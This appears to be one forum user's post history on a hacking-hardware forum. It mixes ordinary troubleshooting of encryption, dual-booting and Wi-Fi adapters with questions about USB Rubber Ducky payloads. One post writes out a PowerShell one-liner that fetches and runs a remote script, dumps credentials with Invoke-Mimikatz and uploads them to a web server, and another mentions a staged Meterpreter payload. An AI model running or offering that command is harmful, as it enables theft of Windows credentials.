    Encryption help

Ah I didn't know that about Veracrypt. Not too big of a deal to keep a small Partition for the portable version, but I can see why that would semi annoying that you NEED Veracrypt to decrypt it.

    Encryption help

So I recently got myself a 2nd External Drive I want to use for Backups and such. So I wanted to encrypt the entire drive but not sure what to use. I'd like it to be used on Windows and Linux so I can backup files and such from both systems. When I looked into it I had read about Veracrypt but i'm curious to know what you guys might use/have used and recommend.
  3. Yeah I know, I took it as a joke. I was just replying to be stupid. GUessI should have put some more feelings into it to make it more obviosu I was being silly about it. xD
  4. I am in no way a Mac user, I do not own anything Mac/Apple/i anything BUT I have a USB-C to Ethernet adapter becayse my phone(Moto Z force) is USB-C. Mind you I only have one, and do not carry it around with me...BUT none the less, I do have one.
  5. You just load the file(s) onto the Micro SD card. Depending on how you have the Payload setup you might need to make sure the MicroSD card is named something specific. Like "DUCKY" for example since some payloads look for a drive named "DUCKY" and look for the file(s) from that. I hope that made sense.
  6. God dammit. xD I was reading through it all incase I missed something but apparently I just skipped right over that. I read the sentence RIGHT before that but stopped there for whatever reason. Go me...
  7. So the "WindowsMeterpreterStaged" payload under the "remote_access" folder in the library. I have 4 files: payload.txt, readme.md, sc.txt, and windows-staged-meterpreter.txt", but when looking through the "payload.txt" it says I need to have the sc.txt and update.exe on my remote server. I can do that no problem except I don't have, nor can I find the "update.exe" anywhere. Am I missing somehting or..?
  8. Wouldn't hurt to check and never hurts to have another one, considering that are relatively cheap.
  9. Have you tried a different micro SD card? I know one of my many that I have didn't want to work correctly with the Ducky for whatever reason.
  10. You said the file name is "index.bin", it should be "inject.bin". Try re-encoding and naming it "inject.bin" (without the quotes obviously xD) and try again.
  11. It's maybe 2 years old. So i'm sure i'm fine. A small drop? It's an internal HDD, in a desktop that I don't move. Take those unnecessary insults somewhere else.
  12. I just ended up using an old 350GB HDD and slapped that in and dual-booting with that. I just never really thought to try it or look into it. Most the time myt laptop is my Linux station.
  13. When I was working with this, I found it SEEMS to be an issue with WIndows 10, I got it to work on Win7 with no issues but when I tried it on 5-6 various Win10 machines, I always get that output, been looking for a fix for that.
  14. I am but that is disabled. I know the AV Detects it. Contacting the ower - I posted it here since it was @Darren Kitchen who made the Youtube video on it.
  15. There is a spot about it on the Github. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky/
  16. So I did some lookin around about if it's safe/OK to partition/Dual-boot a SSD. Most things I found it we're VERY back and forth. Some said you can but it's NOT recommended due to it will degrade faster, while others said there won't be an affect at all, while others said if you do it will have a huge problem with performance. I was wondering if anyone here has done dual-booting from an SSD and if they can shed some extra light on this for me.
  17. I would assume the file located on a FTP or Web Server? You can always have it open the FTP/WebServer through either the FileExplorer or Web Browser and download it that way.
  18. 100% Positive. I'm doing it from my Windows10 Laptop, running this script from an administrator command prompt. powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" With that I still get the Output I put in my first post.
  19. That's pretty much what I was going to go with. Well thanks for the help and input. I appreciate it, you're the only person to help shed some light on this issue.
  20. Ah gotcha. and yeah my bad I forgot, im more use to doing ifconfig than iwconfig. here's the iwconfig of the TP-Link adapter. wlan1 IEEE 802.11 ESSID:"MyWiFi" Mode:Managed Frequency:2.437 GHz Access Point: MAC Bit Rate=54 Mb/s Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=70/70 Signal level=-35 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:7 Missed beacon:0 Speed Test with the TP-Link adapter - 16.89Mbps down and 6.27Mbps Up(Normal speeds for my net) Speed test with the RTL8723BE adapter at 20db - 6.83Mbps down and 6.09Mbps Up When doing an iwconfig after I try the "iwconfig wlan0 txpower 30" command, it still says it's at 20. No changes. I just caught on to that.
  21. Alright so far it seems that iwconfig wlan0 txpower 30 seemed to help a bit. Not SHOWING a much better connection but it seems a bit more stable. The 2nd command there "iw phy wlan0 set txpower fixed 30mBm" comes back an error "command failed: No such file or directory (-2)" Here's the ifconfig of my TP-Link adapter wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.107 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::62e3:27ff:fe16:3dd prefixlen 64 scopeid 0x20<link> inet6 2605:a000:122c:1ca:62e3:27ff:fe16:3dd prefixlen 64 scopeid 0x0<global> inet6 2605:a000:122c:1ca:7083:f3fd:979b:b758 prefixlen 64 scopeid 0x0<global> ether 60:e3:27:16:03:dd txqueuelen 1000 (Ethernet) RX packets 79 bytes 11394 (11.1 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 60 bytes 8957 (8.7 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  22. I'll give this a try later today when i'm home and such and post back the result.
  23. So thanks to ThoughtfulDev I was able to get this workings very nicely. So after testing it on mine and my cousinsg Windows 7 PC(With his permission of course), those worked great, but when testing with our Windows 10 PC's, I got an error. .#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 .## ^ ##. I tried this on a few other Windows 10 PC's to make sure it wasn't just those PC's in specific. I was wondering if anyone else has gotten this or might know a way around this or a possible fix.
  24. My iwconfig return this: wlan0 IEEE 802.11 ESSID:"MyWiFi" Mode:Managed Frequency:2.437 GHz Access Point: MAC Bit Rate=54 Mb/s Tx-Power=20 dBm Retry short limit:7 RTS thr=2347 B Fragment thr:off Encryption key:off Power Management:off Link Quality=46/70 Signal level=-64 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:5 Missed beacon:0 I have no issues when using the TP-Link TL-WN722N adapter but i'd rather not have to use that everywhere I go just to get a decent connection.
